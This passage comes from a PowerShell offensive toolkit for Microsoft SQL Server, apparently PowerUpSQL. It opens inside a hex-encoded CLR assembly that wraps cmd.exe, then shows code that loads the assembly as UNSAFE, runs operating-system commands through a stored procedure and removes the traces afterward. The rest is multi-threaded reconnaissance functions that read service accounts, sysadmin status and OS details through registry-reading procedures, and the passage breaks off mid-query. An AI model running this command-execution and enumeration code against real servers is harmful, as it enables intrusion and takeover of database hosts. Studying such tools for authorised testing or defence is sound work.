47941747472696275746500434C5246696C65004D6963726F736F66742E53716C5365727665722E5365727665720053716C50726F6365647572654174747269627574650053797374656D2E446961676E6F73746963730050726F636573730050726F636573735374617274496E666F006765745F5374617274496E666F007365745F46696C654E616D65006765745F56616C756500537472696E6700466F726D6174007365745F417267756D656E7473007365745F5573655368656C6C45786563757465007365745F52656469726563745374616E646172644F75747075740053746172740053716C4D657461446174610053716C4462547970650053716C446174615265636F72640053716C436F6E746578740053716C50697065006765745F506970650053656E64526573756C747353746172740053797374656D2E494F0053747265616D526561646572006765745F5374616E646172644F757470757400546578745265616465720052656164546F456E6400546F537472696E6700536574537472696E670053656E64526573756C7473526F770053656E64526573756C7473456E640057616974466F724578697400436C6F736500003743003A005C00570069006E0064006F00770073005C00530079007300740065006D00330032005C0063006D0064002E00650078006500000F20002F00430020007B0030007D00000D6F00750074007000750074000000FCEE91D85F31C540B0756AD6B62A5C020008B77A5C561934E0890500010111090320000104200101080401000000042000121D042001010E0320000E0500020E0E1C042001010203200002072003010E11290A062001011D1225040000123505200101122D042000123905200201080E0907031219122D1D12250801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F77730100002827000000000000000000003E270000002000000000000000000000000000000000000000000000302700000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000440200000000000000000000440234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004A4010000010053007400720069006E006700460069006C00650049006E0066006F0000008001000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000038000C00010049006E007400650072006E0061006C004E0061006D006500000043004C005200460069006C0065002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000040000C0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000043004C005200460069006C0065002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E00300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000503700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 with permission_set = UNSAFE\"\n                Get-SQLQuery -Instance $Instance -Query $Query_AddAssembly -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database \"MSDB\" \n                \n                # Create procedure\n                $Query_AddProc = \"CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (MAX) AS EXTERNAL NAME [cmd_exec].[StoredProcedures].[cmd_exec];\"\n                Get-SQLQuery -Instance $Instance -Query $Query_AddProc -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database \"MSDB\" \n\n                # Setup OS command\n                Write-Verbose -Message \"$Instance : Running command: $Command\"\n                $Query = \"EXEC [dbo].[cmd_exec] '$Command'\"                \n\n                # Execute OS command\n                $CmdResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database \"MSDB\" | Select-Object -Property output -ExpandProperty output\n\n                # Display results or add to final results table\n                if($RawResults)\n                {\n                    $CmdResults\n                }\n                else\n                {\n                    $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.trim())\n                }\n\n                # Remove procedure and assembly\n                Get-SQLQuery -Instance $Instance -Query \"DROP PROCEDURE cmd_exec\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database \"MSDB\"\n                Get-SQLQuery -Instance $Instance -Query \"DROP ASSEMBLY cmd_exec\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database \"MSDB\"\n\n                # Restore CLR state if needed\n                if($DisableCLR -eq 1)\n                {\n                    Write-Verbose -Message \"$Instance : Disabling CLR\"\n                    Get-SQLQuery -Instance $Instance -Query \"sp_configure 'CLR Enabled',0;RECONFIGURE\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n                }\n\n                # Restore Show Advanced Options state if needed\n                if($DisableShowAdvancedOptions -eq 1)\n                {\n                    Write-Verbose -Message \"$Instance : Disabling Show Advanced Options\"\n                    Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options',0;RECONFIGURE\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n                }\n\n                # Close connection\n                $Connection.Close()\n\n                # Dispose connection\n                $Connection.Dispose()\n            }\n            catch\n            {\n                # Connection failed\n\n                if(-not $SuppressVerbose)\n                {\n                    $ErrorMessage = $_.Exception.Message\n                    Write-Verbose -Message \"$Instance : Connection Failed.\"\n                    #Write-Verbose  \" Error: $ErrorMessage\"\n                }\n\n                # Add record\n                $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Not Accessible')\n            }\n        }\n\n        # Run scriptblock using multi-threading\n        $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue\n\n        return $TblResults\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLServerInfo\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLServerInfo\n{\n    <#\n            .SYNOPSIS\n            Returns basic server and user information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerInfo -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName           : SQLServer1\n            Instance               : SQLServer1\\STANDARDDEV2014\n            DomainName             : Domain\n            ServiceProcessId       : 6758\n            ServiceName            : MSSQL$STANDARDDEV2014\n            ServiceAccount         : LocalSystem\n            AuthenticationMode     : Windows and SQL Server Authentication\n            Clustered              : No\n            SQLServerVersionNumber : 12.0.4213.0\n            SQLServerMajorVersion  : 2014\n            SQLServerEdition       : Developer Edition (64-bit)\n            SQLServerServicePack   : SP1\n            OSArchitecture         : X64\n            OsMachineType          : WinNT\n            OSVersionName          : Windows 8.1 Pro\n            OsVersionNumber        : 6.3\n            Currentlogin           : Domain\\MyUser\n            IsSysadmin             : Yes\n            ActiveSessions         : 1\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerInfo -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblServerInfo = New-Object -TypeName System.Data.DataTable\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Get number of active sessions for server\n        $ActiveSessions = Get-SQLSession -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose |\n        Where-Object -FilterScript {\n            $_.SessionStatus -eq 'running'\n        } |\n        Measure-Object -Line |\n        Select-Object -Property Lines -ExpandProperty Lines\n\n        # Get sysadmin status\n        $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n\n        if($IsSysadmin -eq 'Yes')\n        {\n            # Grab additional information if sysadmin\n            $SysadminSetup = \"\n                -- Get machine type\n                DECLARE @MachineType  SYSNAME\n                EXECUTE master.dbo.xp_regread\n                @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n                @key\t\t\t= N'SYSTEM\\CurrentControlSet\\Control\\ProductOptions',\n                @value_name\t\t= N'ProductType',\n                @value\t\t\t= @MachineType output\n\n                -- Get OS version\n                DECLARE @ProductName  SYSNAME\n                EXECUTE master.dbo.xp_regread\n                @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n                @key\t\t\t= N'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion',\n                @value_name\t\t= N'ProductName',\n            @value\t\t\t= @ProductName output\"\n\n            $SysadminQuery = '  @MachineType as [OsMachineType],\n            @ProductName as [OSVersionName],'\n        }\n        else\n        {\n            $SysadminSetup = ''\n            $SysadminQuery = ''\n        }\n\n        # Define Query\n        $Query = \"  -- Get SQL Server Information\n\n            -- Get SQL Server Service Name and Path\n            DECLARE @SQLServerInstance varchar(250)\n            DECLARE @SQLServerServiceName varchar(250)\n            if @@SERVICENAME = 'MSSQLSERVER'\n            BEGIN\n            set @SQLServerInstance = 'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER'\n            set @SQLServerServiceName = 'MSSQLSERVER'\n            END\n            ELSE\n            BEGIN\n            set @SQLServerInstance = 'SYSTEM\\CurrentControlSet\\Services\\MSSQL$'+cast(@@SERVICENAME as varchar(250))\n            set @SQLServerServiceName = 'MSSQL$'+cast(@@SERVICENAME as varchar(250))\n            END\n\n            -- Get SQL Server Service Account\n            DECLARE @ServiceaccountName varchar(250)\n            EXECUTE master.dbo.xp_instance_regread\n            N'HKEY_LOCAL_MACHINE', @SQLServerInstance,\n            N'ObjectName',@ServiceAccountName OUTPUT, N'no_output'\n\n            -- Get authentication mode\n            DECLARE @AuthenticationMode INT\n            EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',\n            N'Software\\Microsoft\\MSSQLServer\\MSSQLServer',\n            N'LoginMode', @AuthenticationMode OUTPUT\n\n            -- Grab additional information as sysadmin\n            $SysadminSetup\n\n            -- Return server and version information\n            SELECT  '$ComputerName' as [ComputerName],\n            @@servername as [Instance],\n            DEFAULT_DOMAIN() as [DomainName],\n            SERVERPROPERTY('processid') as ServiceProcessID,\n            @SQLServerServiceName as [ServiceName],\n            @ServiceAccountName as [ServiceAccount],\n            (SELECT CASE @AuthenticationMode\n            WHEN 1 THEN 'Windows Authentication'\n            WHEN 2 THEN 'Windows and SQL Server Authentication'\n            ELSE 'Unknown'\n            END) as [AuthenticationMode],\n            CASE  SERVERPROPERTY('IsClustered')\n            WHEN 0\n            THEN 'No'\n            ELSE 'Yes'\n            END as [Clustered],\n            SERVERPROPERTY('productversion') as [SQLServerVersionNumber],\n            SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4) as [SQLServerMajorVersion],\n            serverproperty('Edition') as [SQLServerEdition],\n            SERVERPROPERTY('ProductLevel') AS [SQLServerServicePack],\n            SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3) as [OSArchitecture],\n            $SysadminQuery\n            RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows NT', @@VERSION), 14), 3) as [OsVersionNumber],\n            SYSTEM_USER as [Currentlogin],\n            '$IsSysadmin' as [IsSysadmin],\n        '$ActiveSessions' as [ActiveSessions]\"\n        # Execute Query\n        $TblServerInfoTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Append as needed\n        $TblServerInfo = $TblServerInfo + $TblServerInfoTemp\n    }\n\n    End\n    {\n        # Return data\n        $TblServerInfo\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLServerInfoThreaded\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLServerInfoThreaded\n{\n    <#\n            .SYNOPSIS\n            Returns basic server and user information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Instance\n            Number of host threads.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerInfoThreaded -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName           : SQLServer1\n            Instance               : SQLServer1\\STANDARDDEV2014\n            DomainName             : Domain\n            ServiceName            : MSSQL$STANDARDDEV2014\n            ServiceAccount         : LocalSystem\n            AuthenticationMode     : Windows and SQL Server Authentication\n            Clustered              : No\n            SQLServerVersionNumber : 12.0.4213.0\n            SQLServerMajorVersion  : 2014\n            SQLServerEdition       : Developer Edition (64-bit)\n            SQLServerServicePack   : SP1\n            OSArchitecture         : X64\n            OsMachineType          : WinNT\n            OSVersionName          : Windows 8.1 Pro\n            OsVersionNumber        : 6.3\n            Currentlogin           : Domain\\MyUser\n            IsSysadmin             : Yes\n            ActiveSessions         : 1\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerInfoThreaded -Verbose -Threads 20\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of threads.')]\n        [int]$Threads = 5,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Setup data table for output\n        $TblServerInfo = New-Object -TypeName System.Data.DataTable\n        $null = $TblServerInfo.Columns.Add('ComputerName')\n        $null = $TblServerInfo.Columns.Add('Instance')\n        $null = $TblServerInfo.Columns.Add('DomainName')\n        $null = $TblServerInfo.Columns.Add('ServiceName')\n        $null = $TblServerInfo.Columns.Add('ServiceAccount')\n        $null = $TblServerInfo.Columns.Add('AuthenticationMode')\n        $null = $TblServerInfo.Columns.Add('Clustered')\n        $null = $TblServerInfo.Columns.Add('SQLServerVersionNumber')\n        $null = $TblServerInfo.Columns.Add('SQLServerMajorVersion')\n        $null = $TblServerInfo.Columns.Add('SQLServerEdition')\n        $null = $TblServerInfo.Columns.Add('SQLServerServicePack')\n        $null = $TblServerInfo.Columns.Add('OSArchitecture')\n        $null = $TblServerInfo.Columns.Add('OsMachineType')\n        $null = $TblServerInfo.Columns.Add('OSVersionName')\n        $null = $TblServerInfo.Columns.Add('OsVersionNumber')\n        $null = $TblServerInfo.Columns.Add('Currentlogin')\n        $null = $TblServerInfo.Columns.Add('IsSysadmin')\n        $null = $TblServerInfo.Columns.Add('ActiveSessions')\n\n        # Setup data table for pipeline threading\n        $PipelineItems = New-Object -TypeName System.Data.DataTable\n\n        # set instance to local host by default\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Ensure provided instance is processed\n        if($Instance)\n        {\n            $ProvideInstance = New-Object -TypeName PSObject -Property @{\n                Instance = $Instance\n            }\n        }\n\n        # Add instance to instance list\n        $PipelineItems = $PipelineItems + $ProvideInstance\n    }\n\n    Process\n    {\n        # Create list of pipeline items\n        $PipelineItems = $PipelineItems + $_\n    }\n\n    End\n    {\n        # Define code to be multi-threaded\n        $MyScriptBlock = {\n            $Instance = $_.Instance\n\n            # Parse computer name from the instance\n            $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n            # Default connection to local default instance\n            if(-not $Instance)\n            {\n                $Instance = $env:COMPUTERNAME\n            }\n\n            # Test connection to instance\n            $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n                $_.Status -eq 'Accessible'\n            }\n            if($TestConnection)\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Success.\"\n                }\n            }\n            else\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Failed.\"\n                }\n                return\n            }\n\n            # Get number of active sessions for server\n            $ActiveSessions = Get-SQLSession -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose |\n            Where-Object -FilterScript {\n                $_.SessionStatus -eq 'running'\n            } |\n            Measure-Object -Line |\n            Select-Object -Property Lines -ExpandProperty Lines\n\n            # Get sysadmin status\n            $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n\n            if($IsSysadmin -eq 'Yes')\n            {\n                # Grab additional information if sysadmin\n                $SysadminSetup = \"\n                    -- Get machine type\n                    DECLARE @MachineType  SYSNAME\n                    EXECUTE master.dbo.xp_regread\n                    @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n                    @key\t\t\t= N'SYSTEM\\CurrentControlSet\\Control\\ProductOptions',\n                    @value_name\t\t= N'ProductType',\n                    @value\t\t\t= @MachineType output\n\n                    -- Get OS version\n                    DECLARE @ProductName  SYSNAME\n                    EXECUTE master.dbo.xp_regread\n                    @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n                    @key\t\t\t= N'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion',\n                    @value_name\t\t= N'ProductName',\n                @value\t\t\t= @ProductName output\"\n\n                $SysadminQuery = '  @MachineType as [OsMachineType],\n                @ProductName as [OSVersionName],'\n            }\n            else\n            {\n                $SysadminSetup = ''\n                $SysadminQuery = ''\n            }\n\n            # Define Query\n            $Query = \"  -- Get SQL Server Information\n\n                -- Get SQL Server Service Name and Path\n                DECLARE @SQLServerInstance varchar(250)\n                DECLARE @SQLServerServiceName varchar(250)\n                if @@SERVICENAME = 'MSSQLSERVER'\n                BEGIN\n                set @SQLServerInstance = 'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER'\n                set @SQLServerServiceName = 'MSSQLSERVER'\n                END\n                ELSE\n                BEGIN\n                set @SQLServerInstance = 'SYSTEM\\CurrentControlSet\\Services\\MSSQL$'+cast(@@SERVICENAME as varchar(250))\n                set @SQLServerServiceName = 'MSSQL$'+cast(@@SERVICENAME as varchar(250))\n                END\n\n                -- Get SQL Server Service Account\n                DECLARE @ServiceaccountName varchar(250)\n                EXECUTE master.dbo.xp_instance_regread\n                N'HKEY_LOCAL_MACHINE', @SQLServerInstance,\n                N'ObjectName',@ServiceAccountName OUTPUT, N'no_output'\n\n                -- Get authentication mode\n                DECLARE @AuthenticationMode INT\n                EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',\n                N'Software\\Microsoft\\MSSQLServer\\MSSQLServer',\n                N'LoginMode', @AuthenticationMode OUTPUT\n\n                -- Grab additional information as sysadmin\n                $SysadminSetup\n\n                -- Return server and version information\n                SELECT  '$ComputerName' as [ComputerName],\n                @@servername as [Instance],\n                DEFAULT_DOMAIN() as [DomainName],\n                @SQLServerServiceName as [ServiceName],\n                @ServiceAccountName as [ServiceAccount],\n                (SELECT CASE @AuthenticationMode\n                WHEN 1 THEN 'Windows Authentication'\n                WHEN 2 THEN 'Windows and SQL Server Authentication'\n                ELSE 'Unknown'\n                END) as [AuthenticationMode],\n                CASE  SERVERPROPERTY('IsClustered')\n                WHEN 0\n                THEN 'No'\n                ELSE 'Yes'\n                END as [Clustered],\n                SERVERPROPERTY('productversion') as [SQLServerVersionNumber],\n                SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4) as [SQLServerMajorVersion],\n                serverproperty('Edition') as [SQLServerEdition],\n                SERVERPROPERTY('ProductLevel') AS [SQLServerServicePack],\n                SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3) as [OSArchitecture],\n                $SysadminQuery\n                RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows NT', @@VERSION), 14), 3) as [OsVersionNumber],\n                SYSTEM_USER as [Currentlogin],\n                '$IsSysadmin' as [IsSysadmin],\n            '$ActiveSessions' as [ActiveSessions]\"\n            # Execute Query\n            $TblServerInfoTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Append as needed\n            $TblServerInfoTemp |\n            ForEach-Object -Process {\n                # Add row\n                $null = $TblServerInfo.Rows.Add(\n                    $_.ComputerName,\n                    $_.Instance,\n                    $_.DomainName,\n                    $_.ServiceName,\n                    $_.ServiceAccount,\n                    $_.AuthenticationMode,\n                    $_.Clustered,\n                    $_.SQLServerVersionNumber,\n                    $_.SQLServerMajorVersion,\n                    $_.SQLServerEdition,\n                    $_.SQLServerServicePack,\n                    $_.OSArchitecture,\n                    $_.OsMachineType,\n                    $_.OSVersionName,\n                    $_.OsVersionNumber,\n                    $_.Currentlogin,\n                    $_.IsSysadmin,\n                    $_.ActiveSessions\n                )\n            }\n        }\n\n        # Run scriptblock using multi-threading\n        $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue\n\n        return $TblServerInfo\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLDatabase\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLDatabase\n{\n    <#\n            .SYNOPSIS\n            Returns database information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER NoDefaults\n            Only select non default databases.\n            .PARAMETER HasAccess\n            Only select databases the current user has access to.\n            .PARAMETER SysAdminOnly\n            Only select databases owned by a sysadmin.\n            .EXAMPLE\n            PS C:\\> Get-SQLDatabase -Instance SQLServer1\\STANDARDDEV2014 -NoDefaults -DatabaseName testdb\n\n            ComputerName        : SQLServer1\n            Instance            : SQLServer1\\STANDARDDEV2014\n            DatabaseId          : 7\n            DatabaseName        : testdb\n            DatabaseOwner       : sa\n            OwnerIsSysadmin     : 1\n            is_trustworthy_on   : True\n            is_db_chaining_on   : False\n            is_broker_enabled   : True\n            is_encrypted        : False\n            is_read_only        : False\n            create_date         : 4/13/2016 4:27:36 PM\n            recovery_model_desc : FULL\n            FileName            : C:\\Program Files\\Microsoft SQL Server\\MSSQL12.STANDARDDEV2014\\MSSQL\\DATA\\testdb.mdf\n            DbSizeMb            : 3.19\n            has_dbaccess        : 1\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLDatabase -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only select non default databases.')]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only select databases the current user has access to.')]\n        [switch]$HasAccess,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only select databases owned by a sysadmin.')]\n        [switch]$SysAdminOnly,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Create data tables for output\n        $TblResults = New-Object -TypeName System.Data.DataTable\n        $TblDatabases = New-Object -TypeName System.Data.DataTable\n        $null = $TblDatabases.Columns.Add('ComputerName')\n        $null = $TblDatabases.Columns.Add('Instance')\n        $null = $TblDatabases.Columns.Add('DatabaseId')\n        $null = $TblDatabases.Columns.Add('DatabaseName')\n        $null = $TblDatabases.Columns.Add('DatabaseOwner')\n        $null = $TblDatabases.Columns.Add('OwnerIsSysadmin')\n        $null = $TblDatabases.Columns.Add('is_trustworthy_on')\n        $null = $TblDatabases.Columns.Add('is_db_chaining_on')\n        $null = $TblDatabases.Columns.Add('is_broker_enabled')\n        $null = $TblDatabases.Columns.Add('is_encrypted')\n        $null = $TblDatabases.Columns.Add('is_read_only')\n        $null = $TblDatabases.Columns.Add('create_date')\n        $null = $TblDatabases.Columns.Add('recovery_model_desc')\n        $null = $TblDatabases.Columns.Add('FileName')\n        $null = $TblDatabases.Columns.Add('DbSizeMb')\n        $null = $TblDatabases.Columns.Add('has_dbaccess')\n\n        # Setup database filter\n        if($DatabaseName)\n        {\n            $DatabaseFilter = \" and a.name like '$DatabaseName'\"\n        }\n        else\n        {\n            $DatabaseFilter = ''\n        }\n\n        # Setup NoDefault filter\n        if($NoDefaults)\n        {\n            $NoDefaultsFilter = \" and a.name not in ('master','tempdb','msdb','model')\"\n        }\n        else\n        {\n            $NoDefaultsFilter = ''\n        }\n\n        # Setup HasAccess filter\n        if($HasAccess)\n        {\n            $HasAccessFilter = ' and HAS_DBACCESS(a.name)=1'\n        }\n        else\n        {\n            $HasAccessFilter = ''\n        }\n\n        # Setup owner is sysadmin filter\n        if($SysAdminOnly)\n        {\n            $SysAdminOnlyFilter = \" and IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid))=1\"\n        }\n        else\n        {\n            $SysAdminOnlyFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Check version\n        $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber\n        if($SQLVersionFull)\n        {\n            $SQLVersionShort = $SQLVersionFull.Split('.')[0]\n        }\n\n        # Base query\n        $QueryStart = \"  SELECT  '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            a.database_id as 